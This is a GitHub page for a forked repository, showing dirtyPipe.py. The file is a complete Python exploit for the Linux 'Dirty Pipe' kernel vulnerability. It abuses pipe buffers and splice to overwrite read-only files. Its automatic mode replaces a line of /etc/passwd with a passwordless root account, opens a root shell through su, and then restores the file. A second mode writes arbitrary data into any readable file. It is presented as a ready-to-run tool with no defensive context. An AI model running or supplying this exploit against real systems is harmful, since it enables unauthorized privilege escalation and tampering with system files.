forked from nanaao/dirtyPipe-automaticRoot
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdirtyPipe.py
executable file
·106 lines (76 loc) · 2.69 KB
/
dirtyPipe.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
import os, sys, argparse, fcntl
PAGE_SIZE = 4096
def preparePipe():
r, w = os.pipe()
try:
pipeSize = fcntl.fcntl(w, fcntl.F_GETPIPE_SZ)
except AttributeError:
print("Sorry, use the 3.10 python version or above.")
sys.exit(1)
buffer = bytes(4096)
i = 0
while i < pipeSize/PAGE_SIZE:
os.write(w, buffer)
i += 1
i = 0
while i < pipeSize/PAGE_SIZE:
os.read(r, len(buffer))
i += 1
return w
def exploit(fi, offset, data):
try:
f = os.open(fi, os.O_RDONLY)
lenF = len(open(fi).read())
except FileNotFoundError:
print("Couldn't open file.")
sys.exit(1)
if offset % PAGE_SIZE == 0:
print('Sorry, cannot start writing at a page boundary.')
sys.exit(1)
nextPage = (offset | (PAGE_SIZE - 1)) + 1
endOffset = offset + len(data)
if endOffset > nextPage:
print("Sorry, cannot write accross a page bondary")
sys.exit(1)
if offset > lenF:
print("Sorry, offset is not inside the file.")
sys.exit(1)
if endOffset > lenF:
print("Sorry, cannot enlarge the file")
sys.exit(1)
w = preparePipe()
os.splice(f, w, offset)
os.write(w, data.encode())
return 0
def automaticRoot():
passwdCopy = open('/etc/passwd', 'r').readlines()[:10]
offset = 0
for i in range(5):
offset += len(passwdCopy[i])
originalLogin = passwdCopy[5]
originalLoginLength = len(originalLogin)
spoofLogin = "terabitSec::0:0::/:/bin/sh"
spoofedLoginLength = len(spoofLogin)
spoofLogin += '\00' * ((originalLoginLength - spoofedLoginLength) - 1)
print("[+] hjacking super user in /etc/passwd")
exploit('/etc/passwd', offset, f'{spoofLogin}\n')
print("[+] dropping shell")
if os.system('/bin/su terabitSec') != 0:
print("[!] couldn't spawn root shell with /bin/su binary")
print("[+] restoring original user in /etc/passwd")
exploit('/etc/passwd', offset, f'{originalLogin}')
return 0
def main():
parser = argparse.ArgumentParser(epilog="An offering from https://github.com/terabitSec.")
group = parser.add_mutually_exclusive_group()
group.add_argument('-a', '--automatic', action='store_true', help="Try automatic root by hjacking a super user.")
group.add_argument('-w', '--writeFile', nargs=3, metavar=('FILE', 'OFFSET', 'DATA'), help="Use dirty pipe exploit to write a file you can read.")
args = parser.parse_args()
if args.automatic:
automaticRoot()
elif args.writeFile:
f, offset, data = args.writeFile
exploit(f, int(offset), data)
else:
parser.print_help()
main()